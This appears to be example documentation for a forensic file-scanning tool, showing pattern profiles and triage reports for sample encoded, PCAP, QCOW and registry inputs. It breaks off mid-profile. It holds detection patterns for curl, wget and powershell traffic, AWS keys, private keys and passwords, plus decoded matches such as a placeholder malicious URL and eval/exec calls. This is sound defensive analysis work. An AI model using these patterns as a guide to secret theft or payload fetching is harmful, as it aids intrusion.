/encoded_content.txt/encoded_content.txt.unicode-escape-sequences	encoded_content.txt.unicode-escape-sequences	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2				[]	1
/encoded_content.txt	encoded_content.txt	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/plain"]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Shell Command	regex	/bin/bash	7:25	9
2	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded URL	regex	https://malicious.example.com	24:22	29
3	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded IP Address	regex	192.168.1.100	27:21	13
4	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Eval	regex	eval(	30:33	5
5	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Exec	regex	exec(	33:33	5
6	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Password	string	password	4:19	8
7	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Secret	string	secret	4:28	6
8	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Secret	string	secret	12:16	6
9	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Secret	string	secret	13:5	6
10	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Password	string	password	15:16	8
11	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded Password	string	password	16:16	8
12	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded PowerShell	string	powershell	21:19	10
13	352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	Decoded PowerShell	string	powershell	22:20	10
14	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Shell Command	regex	/bin/bash	7:25	9
15	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded URL	regex	https://malicious.example.com	24:22	29
16	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded IP Address	regex	192.168.1.100	27:21	13
17	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Eval	regex	eval(	30:33	5
18	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Exec	regex	exec(	33:33	5
19	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Password	string	password	4:19	8
20	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Secret	string	secret	4:28	6
21	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Secret	string	secret	12:16	6
22	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Secret	string	secret	13:5	6
23	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Password	string	password	15:16	8
24	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded Password	string	password	16:16	8
25	df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	Decoded PowerShell	string	powershell	21:19	10
26	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Shell Command	regex	/bin/bash	7:25	9
27	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded URL	regex	https://malicious.example.com	24:22	29
28	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded IP Address	regex	192.168.1.100	27:21	13
29	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Eval	regex	eval(	30:33	5
30	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Exec	regex	exec(	33:33	5
31	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Password	string	password	4:19	8
32	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Secret	string	secret	4:28	6
33	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Secret	string	secret	12:16	6
34	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Secret	string	secret	13:5	6
35	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Password	string	password	15:16	8
36	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded Password	string	password	16:16	8
37	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded PowerShell	string	powershell	21:19	10
38	312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	Decoded PowerShell	string	powershell	22:20	10
39	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Shell Command	regex	/bin/bash	7:25	9
40	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded URL	regex	https://malicious.example.com	24:22	29
41	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded IP Address	regex	192.168.1.100	27:21	13
42	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Eval	regex	eval(	30:33	5
43	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Exec	regex	exec(	33:33	5
44	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Password	string	password	4:19	8
45	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Secret	string	secret	4:28	6
46	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Secret	string	secret	12:16	6
47	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Secret	string	secret	13:5	6
48	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Password	string	password	15:16	8
49	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded Password	string	password	16:16	8
50	a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	Decoded PowerShell	string	powershell	21:19	10
51	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Shell Command	regex	/bin/bash	7:25	9
52	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded URL	regex	https://malicious.example.com	24:22	29
53	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded IP Address	regex	192.168.1.100	27:21	13
54	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Eval	regex	eval(	30:33	5
55	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Exec	regex	exec(	33:33	5
56	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Password	string	password	4:19	8
57	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Secret	string	secret	4:28	6
58	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Secret	string	secret	12:16	6
59	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Secret	string	secret	13:5	6
60	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Password	string	password	15:16	8
61	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded Password	string	password	16:16	8
62	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded PowerShell	string	powershell	21:19	10
63	444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	Decoded PowerShell	string	powershell	22:20	10
64	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Shell Command	regex	/bin/bash	7:25	9
65	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded URL	regex	https://malicious.example.com	24:22	29
66	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded IP Address	regex	192.168.1.100	27:21	13
67	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Eval	regex	eval(	30:33	5
68	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Exec	regex	exec(	33:33	5
69	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Password	string	password	4:19	8
70	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Secret	string	secret	4:28	6
71	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Secret	string	secret	12:16	6
72	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Secret	string	secret	13:5	6
73	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Password	string	password	15:16	8
74	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded Password	string	password	16:16	8
75	20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	Decoded PowerShell	string	powershell	21:19	10
76	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Shell Command	regex	/bin/bash	7:25	9
77	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded URL	regex	https://malicious.example.com	24:22	29
78	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded IP Address	regex	192.168.1.100	27:21	13
79	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Eval	regex	eval(	30:33	5
80	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Exec	regex	exec(	33:33	5
81	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Password	string	password	4:19	8
82	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Secret	string	secret	4:28	6
83	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Secret	string	secret	12:16	6
84	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Secret	string	secret	13:5	6
85	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Password	string	password	15:16	8
86	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded Password	string	password	16:16	8
87	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded PowerShell	string	powershell	21:19	10
88	fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	Decoded PowerShell	string	powershell	22:20	10
89	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Shell Command	regex	/bin/bash	7:25	9
90	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded URL	regex	https://malicious.example.com	24:22	29
91	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded IP Address	regex	192.168.1.100	27:21	13
92	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Eval	regex	eval(	30:33	5
93	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Exec	regex	exec(	33:33	5
94	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Password	string	password	4:19	8
95	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Secret	string	secret	4:28	6
96	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Secret	string	secret	12:16	6
97	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Secret	string	secret	13:5	6
98	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Password	string	password	15:16	8
99	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded Password	string	password	16:16	8
100	7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	Decoded PowerShell	string	powershell	21:19	10

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
352f2322f3161013de22b3b889f630f4af4e935fd68b41221b0eb6a4cad31c33	2226e6129030d822556d5001316acbf230d461f8	47634d0bae9e8453be3c852ba4a55a63	1068	text/plain	5.44068027690163
df654a907a0f491a0b72935ea60a65a183ef5aced6c7b6c27701f7f100e6dbfb	d52f99fe3a25351c228379238a8005b4c785ad5b	58d36a6a736deaa12758ed564aa96e2a	1118	text/plain	5.51624171557143
312be978a480d5a639fa3ed3ca830a062eaf6ad654407799bade789580488fe4	e8d2ec418967343f5873ce465c77713313ecae07	c127057ad061e05d3c746dc38f9f1e21	1080	text/plain	5.4628686004121
a940cf0d8b9694f5775dcd5e267590b9b700902207f76e81913f9999991f0531	f1dabd3ae4cd4cfb96bd80423fa159383063b5c5	2a86fc8c6b9309ee6582f456e08ce8e6	1130	text/plain	5.53751334260593
444a9458395e7bfd9cbfa05dff249089bf1c438bef713dc0797c778d477245c5	b20cec3e4e38c03134d430bdeca57979ba5f01a0	3966c48c1071ebe3bdb73edb5bd6e733	1070	text/plain	5.449852146702
20e66bf70953650ec5ef7db6afedd4f79500eabc1c6db5bca5c31661185dba27	bf78a462a04914672e9b9e988a5cc510fbb2ac7e	ec31d306ca5191e3c2c76db3f080b5dd	1120	text/plain	5.52482552337943
fb83ac54cccb2c353ee4a53f007dac403f02d9b4f3cbacfdeae93997d5d8f3c2	bb18389495edfadc4c1e1817fc6a6fd0853b4fbc	9d9c7f3a9f13cee59714f92477919aab	1082	text/plain	5.47192750372883
7060620c9e47a84c306a4599fcd4f0ccda7c811ce7a22418191716f72a0805ab	8148872d4e893943280d41bcee15554dd1e339e1	10b1a9d811d97ee6624322b98894173c	1132	text/plain	5.54599576246902

Example: pcap

Inputs

examples/inputs/pcap-samples/README.md
examples/inputs/pcap-samples/sample_network.pcap

Profile

# PCAP Network Capture Analysis Example
# This demonstrates parsing network packet capture (PCAP) files
# The sample_network.pcap file contains a minimal valid PCAP structure with one packet

decode = []

tag = "pcap"

# PCAP file header pattern (magic bytes)
[[patterns]]
  name = "PCAP Magic (LE)"
  pattern = "D4:C3:B2:A1"
  type = "bytes"

[[patterns]]
  name = "PCAP Magic (BE)"
  pattern = "A1:B2:C3:D4"
  type = "bytes"

[[patterns]]
  name = "PCAP-NG Magic"
  pattern = "0A:0D:0D:0A"
  type = "bytes"

# Network protocol patterns
[[patterns]]
  name = "Ethernet Frame"
  pattern = "08:00"
  type = "bytes"

[[patterns]]
  name = "IPv4 Packet"
  pattern = "45:00"
  type = "bytes"

# DNS traffic patterns
[[patterns]]
  name = "DNS Query Port"
  pattern = "00:35"
  type = "bytes"

[[patterns]]
  name = "DNS Response Port"
  pattern = "00:35"
  type = "bytes"

# Common suspicious patterns in network traffic
[[patterns]]
  name = "Private IP Range 192.168"
  pattern = "192\\.168\\."
  type = "regex"

[[patterns]]
  name = "Private IP Range 10."
  pattern = "10\\."
  type = "regex"

# HTTP patterns
[[patterns]]
  name = "HTTP GET"
  pattern = "GET "
  type = "string"

[[patterns]]
  name = "HTTP POST"
  pattern = "POST "
  type = "string"

[[patterns]]
  name = "HTTP User-Agent"
  pattern = "User-Agent:"
  type = "string"
  case-insensitive = true

# Potential malicious patterns
[[patterns]]
  name = "Suspicious User-Agent"
  pattern = "curl|wget|python|powershell"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Port Scan Pattern"
  pattern = "SYN|RST|FIN"
  type = "string"

Report outputs

Triage report (converted from triage_report.json)

total_files	2
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	2
must_investigate_count	0
all_scores	None
generated_at	2026-02-01T11:39:25.366428348+00:00

top_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	Other	0	False	/sample_network.pcap	5	4	6	["4 suspicious patterns detected"]	Minimal	11	572bfa306b2a8ff2938aa7fb045ba7247b4b3ebad076aa944c63bd5b85e95c90
0	Other	0	False	/README.md	0	0	0	[]	Minimal	0	a3e97de119a856c104957ef70de33278488b86d5c682f8d35dbb0f47c053f485

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_symbolic_link	is_extracted_file	is_decoded_file	is_deobfuscated_file	tag
/sample_network.pcap	sample_network.pcap	572bfa306b2a8ff2938aa7fb045ba7247b4b3ebad076aa944c63bd5b85e95c90	2026-02-01T11:24:46.719969497Z	2026-02-01T11:24:46.719969497Z	2026-02-01T11:25:18.689983469Z	["application/vnd.tcpdump.pcap"]	0	0	0	0
/README.md	README.md	a3e97de119a856c104957ef70de33278488b86d5c682f8d35dbb0f47c053f485	2026-02-01T11:24:46.719969497Z	2026-02-01T11:24:46.719969497Z	2026-02-01T11:25:18.689983469Z	["application/x-genesis-rom"]	0	0	0	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	572bfa306b2a8ff2938aa7fb045ba7247b4b3ebad076aa944c63bd5b85e95c90	PCAP Magic (LE)	bytes	�ò�	0	4
2	572bfa306b2a8ff2938aa7fb045ba7247b4b3ebad076aa944c63bd5b85e95c90	Ethernet Frame	bytes		52	2
3	572bfa306b2a8ff2938aa7fb045ba7247b4b3ebad076aa944c63bd5b85e95c90	IPv4 Packet	bytes	E	54	2
4	572bfa306b2a8ff2938aa7fb045ba7247b4b3ebad076aa944c63bd5b85e95c90	DNS Query Port	bytes		76	2

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
572bfa306b2a8ff2938aa7fb045ba7247b4b3ebad076aa944c63bd5b85e95c90	f4cce328565be999ba6285127fb5cab6b105e87e	0142c4bceadf5a8e3a21bac956842443	90	application/vnd.tcpdump.pcap	3.07257160262939
a3e97de119a856c104957ef70de33278488b86d5c682f8d35dbb0f47c053f485	7003b899cedb7e97ecdb284e8d450cd9fb5af151	eb8b335532bc6cc6615224654cdd5682	1053	text/plain	4.73902362133387

Example: qcow-forensic

Inputs

examples/inputs/qcow-forensic-samples/README.md
examples/inputs/qcow-forensic-samples/sample.qcow2

Profile

# QCOW Forensic Image Example Profile
# Demonstrates analysis of QCOW (QEMU Copy On Write) forensic disk images

decode = ["base64"]

max-file-size = 104857600  # 100 MiB

tag = "qcow-forensic"

# Patterns to match in QCOW images and extracted partitions
[[patterns]]
  name = "QCOW Signature"
  pattern = "51:46:49:FB"  # "QFI\xfb" at header (QCOW/QCOW2/QCOW3)
  type = "bytes"

[[patterns]]
  name = "AWS Access Key"
  pattern = "AKIA[0-9A-Z]{16}"
  type = "regex"

[[patterns]]
  name = "AWS Secret Key"
  pattern = "(?i)aws.{0,20}secret.{0,20}['\"][0-9a-zA-Z/+=]{40}['\"]"
  type = "regex"

[[patterns]]
  name = "SSH Private Key"
  pattern = "-----BEGIN.*PRIVATE KEY-----"
  type = "regex"

[[patterns]]
  name = "Password in Config"
  pattern = "password\\s*=\\s*['\"]?[^'\"\\s]+"
  type = "regex"

[[patterns]]
  name = "Database Connection String"
  pattern = "jdbc:[a-zA-Z0-9]+://[^\\s]+password=[^\\s&;]+"
  type = "regex"

[[patterns]]
  name = "MBR Boot Signature"
  pattern = "55:AA"
  type = "bytes"

[[patterns]]
  name = "GPT Signature"
  pattern = "45:46:49:20:50:41:52:54"  # "EFI PART"
  type = "bytes"

[[patterns]]
  name = "NTFS Signature"
  pattern = "4E:54:46:53"  # "NTFS"
  type = "bytes"

[[patterns]]
  name = "Email Address"
  pattern = "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

Report outputs

Triage report (converted from triage_report.json)

total_files	3
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	3
must_investigate_count	0
all_scores	None
generated_at	2026-02-01T01:44:30.568861735+00:00

top_scores

file_type	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Other	False	/sample.qcow2	5	2	3	["2 suspicious patterns detected"]	Minimal	8	6461736b27529f047823e7c100131897542d5ae2d4fbe4af1c073c2b4e9c7c1f
Other	False	/README.md	0	0	0	[]	Minimal	0	a8e3ac3e3bbbe8fc934e70ef9046b33c6975c8a572dace67a4604a48bbd1b1e6
Other	False	/sample.qcow2/sample.qcow2:qcow:metadata	0	0	0	[]	Minimal	0	b47571aa892b329fca6fc99a24df380103ff97a2a22ff57659ff4999e080a82a

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_extracted_file
/README.md	README.md	a8e3ac3e3bbbe8fc934e70ef9046b33c6975c8a572dace67a4604a48bbd1b1e6	2026-02-01T01:26:44.645674012Z	2026-02-01T01:26:44.645674012Z	2026-02-01T01:27:13.235271167Z	["application/x-genesis-rom"]	0
/sample.qcow2/sample.qcow2:qcow:metadata	sample.qcow2:qcow:metadata	b47571aa892b329fca6fc99a24df380103ff97a2a22ff57659ff4999e080a82a				[]	1
/sample.qcow2	sample.qcow2	6461736b27529f047823e7c100131897542d5ae2d4fbe4af1c073c2b4e9c7c1f	2026-02-01T01:26:44.645674012Z	2026-02-01T01:26:44.672673717Z	2026-02-01T01:27:13.235271167Z	["application/x-qemu-disk"]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	6461736b27529f047823e7c100131897542d5ae2d4fbe4af1c073c2b4e9c7c1f	QCOW Signature	bytes	QFI�	0	4
2	6461736b27529f047823e7c100131897542d5ae2d4fbe4af1c073c2b4e9c7c1f	Email Address	regex	test@example.com	2:7	16

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
a8e3ac3e3bbbe8fc934e70ef9046b33c6975c8a572dace67a4604a48bbd1b1e6	aae56b1ceca472f663040d350c14913c163206f5	59243f291f4d2c6b4526a5d87f099575	3095	text/plain	5.05082053829356
b47571aa892b329fca6fc99a24df380103ff97a2a22ff57659ff4999e080a82a	b057cb3910d3b078984eff6d85a05691c70f46f6	516cd80888f7e98f3d529e3ee6c0302e	881	text/plain	5.03263993157254
6461736b27529f047823e7c100131897542d5ae2d4fbe4af1c073c2b4e9c7c1f	40d7e4ec2cc7fab69057f0067cb38e6751a8bd67	0c6e0572f9642cecdfbbe4c87255b9c1	1048576	application/x-qemu-disk	0.0030719323240831

Example: registry

Inputs

examples/inputs/registry-samples/registry_artifacts.txt
examples/inputs/registry-samples/sample_ntuser.dat

Profile

# Windows Registry Parsing Example
# This demonstrates parsing real Windows Registry hive files
# The sample_ntuser.dat file contains a minimal valid registry hive structure
# Use --parse-registry CLI flag to parse the registry files

decode = []

tag = "registry"

# UserAssist patterns (ROT13 encoded program names)
[[patterns]]
  name = "UserAssist Entry"
  pattern = "HRZR_EHACNGU|HRZR_EHAPCY"
  type = "regex"

# ShimCache patterns
[[patterns]]
  name = "AppCompatCache"
  pattern = "AppCompatCache"
  type = "string"
  case-insensitive = true

# Amcache patterns
[[patterns]]
  name = "Amcache Reference"
  pattern = "Amcache\\.hve"
  type = "regex"
  case-insensitive = true

# Run key patterns
[[patterns]]
  name = "Run Key Path"
  pattern = "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
  type = "regex"
  case-insensitive = true

# USB device patterns
[[patterns]]
  name = "USB Device"
  pattern = "USBSTOR"
  type = "string"
  case-insensitive = true

# Recent documents
[[patterns]]
  name = "RecentDocs"
  pattern = "RecentDocs"
  type = "string"
  case-insensitive = true

# Network patterns
[[patterns]]
  name = "Network Profile"
  pattern = "NetworkList\\\\Profiles"
  type = "regex"
  case-insensitive = true

# Registry hive file header pattern (hex for "regf")
[[patterns]]
  name = "Registry Hive Header"
  pattern = "72:65:67:66"
  type = "bytes"

Report outputs

Triage report (converted from triage_report.json)

total_files	2
critical_count	0
high_count	0
medium_count	0
low_count	0
minimal_count	2
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:44.251883485+00:00

top_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	Other	0	False	/registry_artifacts.txt	15	14	13	["14 suspicious patterns detected"]	Minimal	28	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7
0	Other	0	False	/sample_ntuser.dat	5	1	0	["1 suspicious patterns detected"]	Minimal	5	beef928f42b43b77e3a10776b41f851f6c75ba33f24f26301b821ec32d5518b6

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_symbolic_link	is_extracted_file	is_decoded_file	is_deobfuscated_file	tag
/registry_artifacts.txt	registry_artifacts.txt	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T09:19:26.815975983Z	["text/plain"]	0	0	0	0
/sample_ntuser.dat	sample_ntuser.dat	beef928f42b43b77e3a10776b41f851f6c75ba33f24f26301b821ec32d5518b6	2025-12-03T09:15:49.863476387Z	2025-12-03T09:15:49.863476387Z	2025-12-03T09:19:26.815975983Z	[]	0	0	0	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	UserAssist Entry	regex	HRZR_EHACNGU	7:0	12
2	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	UserAssist Entry	regex	HRZR_EHAPCY	8:0	11
3	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	Amcache Reference	regex	Amcache.hve	16:3	11
4	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	Amcache Reference	regex	Amcache.hve	17:0	11
5	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	Run Key Path	regex	Software\Microsoft\Windows\CurrentVersion\Run	23:0	45
6	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	Network Profile	regex	NetworkList\Profiles	36:0	20
7	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	Network Profile	regex	NetworkList\Profiles	40:0	20
8	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	AppCompatCache	string	AppCompatCache	10:4	14
9	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	AppCompatCache	string	AppCompatCache	10:1	14
10	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	USB Device	string	USBSTOR	27:17	7
11	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	USB Device	string	USBSTOR	27:1	7
12	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	USB Device	string	USBSTOR	28:1	7
13	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	RecentDocs	string	RecentDocs	31:1	10
14	6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	RecentDocs	string	RecentDocs	32:1	10
15	beef928f42b43b77e3a10776b41f851f6c75ba33f24f26301b821ec32d5518b6	Registry Hive Header	bytes	regf	0	4

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
6c1f8ebce94bb3481d4fefbd370f2975e624b569517564ecce263e9b99a0e4a7	237a6e90eb77c928471c0a5c0ed17a836f9f29a4	5782cd7932ef98a7ded3305e225a8489	1213	text/plain	5.35654031225439
beef928f42b43b77e3a10776b41f851f6c75ba33f24f26301b821ec32d5518b6	4ce9e8cc03f306ca84ed1f345f029abbc565b295	f8c4f0fa9b0806d35477c98da92f6f11	8192	application/octet-stream	0.0283069713953081

Example: security-audit

Inputs

examples/inputs/security-audit-samples/aws_credentials.txt
examples/inputs/security-audit-samples/config_with_secrets.env
examples/inputs/security-audit-samples/private_keys.pem

Profile

# Security Audit Profile
# Comprehensive profile for security audits focusing on credentials and sensitive data

decode = ["base64", "hex", "percent-encoding", "html-entity"]

max-file-size = 52428800  # 50 MiB

include-path-globs = []
exclude-path-globs = ["**/node_modules/**", "**/vendor/**", "**/.git/**", "**/venv/**", "**/__pycache__/**"]

tag = "security-audit"

# AWS Credentials
